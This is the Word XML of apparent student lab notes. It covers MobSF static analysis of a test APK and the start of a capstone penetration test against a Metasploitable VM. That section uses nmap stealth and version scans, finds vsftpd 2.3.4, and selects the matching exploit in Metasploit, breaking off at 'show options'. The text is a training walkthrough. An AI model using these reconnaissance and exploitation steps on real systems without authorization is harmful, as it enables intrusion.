    <w:p w14:paraId="62EC02A3" w14:textId="35834C9D" w:rsidR="006336CC" w:rsidRDefault="006336CC" w:rsidP="00692C09">
      <w:r>
        <w:t xml:space="preserve">Test file: </w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidRPr="00F23EBE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/MobSF/test_files/blob/master/android.apk</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7279C121" w14:textId="77777777" w:rsidR="006336CC" w:rsidRDefault="006336CC" w:rsidP="00692C09"/>
    <w:p w14:paraId="7AD2EB23" w14:textId="74366206" w:rsidR="006336CC" w:rsidRDefault="006336CC" w:rsidP="00692C09">
      <w:r w:rsidRPr="006336CC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="655B77FD" wp14:editId="6596E588">
            <wp:extent cx="5733415" cy="3323590"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="115274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40718" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3323590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7D9BA3" w14:textId="77777777" w:rsidR="006336CC" w:rsidRDefault="006336CC" w:rsidP="00692C09"/>
    <w:p w14:paraId="5DDA27A7" w14:textId="5B3C6115" w:rsidR="006336CC" w:rsidRDefault="006336CC" w:rsidP="00692C09">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Let’s come back here and upload and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. So, let’s go to my downloads APK. Open and moment truth. See what happens. Hopefully that its not malware and blows up my machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0455C233" w14:textId="77777777" w:rsidR="000E7EB5" w:rsidRDefault="000E7EB5" w:rsidP="00692C09"/>
    <w:p w14:paraId="6E240A1B" w14:textId="6739E28D" w:rsidR="000E7EB5" w:rsidRDefault="006675CC" w:rsidP="00692C09">
      <w:r w:rsidRPr="006675CC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FB61ACF" wp14:editId="3EE8868C">
            <wp:extent cx="5733415" cy="3169920"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="162596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61931" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3169920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D33760" w14:textId="202DA5BB" w:rsidR="000E7EB5" w:rsidRDefault="000E7EB5" w:rsidP="00692C09">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>So, like recent scans, static stat static analysis. Do we have to like let’s go scans. We can do like a static report. I really don’t know what I’m doing to be honest. This is all information.</w:t>
      </w:r>
      <w:r w:rsidR="0088405A">
        <w:t xml:space="preserve"> I guess this is pretty much everything here. I said, this is all new. I just wanted to get it installed. Get a APK file uploaded and I want to tinker with this and you do the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E7BE6B" w14:textId="77777777" w:rsidR="006675CC" w:rsidRDefault="006675CC" w:rsidP="00692C09"/>
    <w:p w14:paraId="7CD3460C" w14:textId="77777777" w:rsidR="0025629C" w:rsidRPr="0025629C" w:rsidRDefault="0025629C" w:rsidP="0025629C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:srgbClr w14:val="000000"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025629C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:srgbClr w14:val="000000"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
        <w:t xml:space="preserve">Title: </w:t>
      </w:r>
      <w:r w:rsidRPr="0025629C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:srgbClr w14:val="000000"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
        <w:t>Capstone Project: Full VAPT Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B27A8" w14:textId="50332F3F" w:rsidR="0025629C" w:rsidRDefault="0025629C" w:rsidP="00692C09"/>
    <w:p w14:paraId="79DDDBAD" w14:textId="64388798" w:rsidR="00B23E9B" w:rsidRDefault="00B23E9B" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B23E9B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tool: Kali Linux, Metasploit, OpenVAS, Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67917A7F" w14:textId="77777777" w:rsidR="00B23E9B" w:rsidRDefault="00B23E9B" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72746D17" w14:textId="6C2EDF6A" w:rsidR="00B23E9B" w:rsidRPr="002509C0" w:rsidRDefault="00B23E9B" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002509C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BC5336" w14:textId="77777777" w:rsidR="00B23E9B" w:rsidRDefault="00B23E9B" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474841D3" w14:textId="4BC6BF9B" w:rsidR="00B23E9B" w:rsidRDefault="00B23E9B" w:rsidP="00692C09">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DD35E5">
        <w:t xml:space="preserve">Open the terminal and first let’s find the IP of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD35E5">
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD35E5">
        <w:t xml:space="preserve"> machine. Type in “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD35E5">
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD35E5">
        <w:t xml:space="preserve">” into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD35E5">
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD35E5">
        <w:t xml:space="preserve"> machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2E1C5" w14:textId="77777777" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09"/>
    <w:p w14:paraId="0139CC5C" w14:textId="17B7E7D4" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09">
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05455C74" wp14:editId="3BC10773">
            <wp:extent cx="5733415" cy="3035300"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="92406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68329" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3035300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F93B9F9" w14:textId="77777777" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09"/>
    <w:p w14:paraId="3C4D6441" w14:textId="63F9948A" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09">
      <w:r>
        <w:t xml:space="preserve">We are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gonna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> perform a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan first and we will perform a stealth scan. Once the scan is complete you will see a list of open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C75138" w14:textId="77777777" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09"/>
    <w:p w14:paraId="70D68A6A" w14:textId="52BEBFB7" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B299B1" w14:textId="77777777" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="407DAE19" w14:textId="7F48E848" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B041D3A" wp14:editId="0AA7A2F8">
            <wp:extent cx="5715000" cy="2301240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="132947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78350" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715500" cy="2301441"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B92889" w14:textId="77777777" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBE21F4" w14:textId="23A44B99" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">We are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intrested</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in port 21/ftp. Now we need to figure out the service running on these open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2326A5D2" w14:textId="6BA94F6C" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD35E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E675D4D" w14:textId="77777777" w:rsidR="00DD35E5" w:rsidRDefault="00DD35E5" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4434919B" w14:textId="7F4A0999" w:rsidR="00DD35E5" w:rsidRDefault="00D94756" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D94756">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="565F1D6E" wp14:editId="3DD3A75C">
            <wp:extent cx="5733415" cy="2141855"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="24081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19658" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2141855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEDAC52" w14:textId="77777777" w:rsidR="00D94756" w:rsidRDefault="00D94756" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78CB8F90" w14:textId="4EDDB28C" w:rsidR="00110F61" w:rsidRDefault="00110F61" w:rsidP="00692C09">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The service running on port 21 is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.3.4. Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to search for an exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0765B740" w14:textId="77777777" w:rsidR="00110F61" w:rsidRDefault="00110F61" w:rsidP="00692C09"/>
    <w:p w14:paraId="300D2F90" w14:textId="2CAA2DB1" w:rsidR="00110F61" w:rsidRDefault="00110F61" w:rsidP="00692C09">
      <w:r w:rsidRPr="00110F61">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17A7A91C" wp14:editId="6494DD5A">
            <wp:extent cx="5733415" cy="838835"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="182960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07466" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="838835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B9EBD1" w14:textId="77777777" w:rsidR="00110F61" w:rsidRDefault="00110F61" w:rsidP="00692C09"/>
    <w:p w14:paraId="2AC02D85" w14:textId="123F2651" w:rsidR="00110F61" w:rsidRDefault="00110F61" w:rsidP="00692C09">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">As this is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit, let’s start Metasploit by typing “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”. The Metasploit framework usually takes a while,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4819570A" w14:textId="4C04881C" w:rsidR="00024E16" w:rsidRDefault="00024E16" w:rsidP="00692C09"/>
    <w:p w14:paraId="788D224B" w14:textId="6770120E" w:rsidR="00024E16" w:rsidRPr="00110F61" w:rsidRDefault="00024E16" w:rsidP="00692C09">
      <w:r w:rsidRPr="00024E16">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5171A2B0" wp14:editId="3A946CC3">
            <wp:extent cx="5733415" cy="3658870"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="109240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01528" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3658870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7497A392" w14:textId="77777777" w:rsidR="00D94756" w:rsidRPr="00DD35E5" w:rsidRDefault="00D94756" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F7BA60" w14:textId="74077CD0" w:rsidR="00024E16" w:rsidRDefault="00024E16" w:rsidP="00692C09">
      <w:r>
        <w:t xml:space="preserve">You can also run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scans through Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E153FBE" w14:textId="77777777" w:rsidR="00024E16" w:rsidRDefault="00024E16" w:rsidP="00692C09"/>
    <w:p w14:paraId="01BFBD79" w14:textId="7FD9AE71" w:rsidR="00B23E9B" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A">
      <w:r w:rsidRPr="00DC6FA9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D062973" wp14:editId="2F95A850">
            <wp:extent cx="5733415" cy="1675765"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="95212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27238" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="1675765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F2DE96" w14:textId="77777777" w:rsidR="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A"/>
    <w:p w14:paraId="3439BDD6" w14:textId="0F6C92AE" w:rsidR="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A">
      <w:r>
        <w:t xml:space="preserve">Use the search command here to find the path of the exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A4E8A" w14:textId="77777777" w:rsidR="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A"/>
    <w:p w14:paraId="68CA7AC2" w14:textId="1A0D826B" w:rsidR="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC6FA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6FA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC6FA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB2FBBF" w14:textId="77777777" w:rsidR="00DC6FA9" w:rsidRPr="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191D7490" w14:textId="55CA9D40" w:rsidR="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A">
      <w:r w:rsidRPr="00DC6FA9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58FF8ADF" wp14:editId="0BA56B58">
            <wp:extent cx="5733415" cy="1098550"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="138088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82461" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="1098550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C99911" w14:textId="77777777" w:rsidR="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A"/>
    <w:p w14:paraId="22EA8466" w14:textId="0559D83F" w:rsidR="00DC6FA9" w:rsidRPr="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DC6FA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6FA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>serialnumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC6FA9">
        <w:t>and type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B90819" w14:textId="3CBC0624" w:rsidR="00DC6FA9" w:rsidRDefault="00DC6FA9" w:rsidP="007D618A">
      <w:r w:rsidRPr="00DC6FA9">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="144474B6" wp14:editId="7CF68CD4">
            <wp:extent cx="5733415" cy="2097405"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="124673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36619" name=""/>
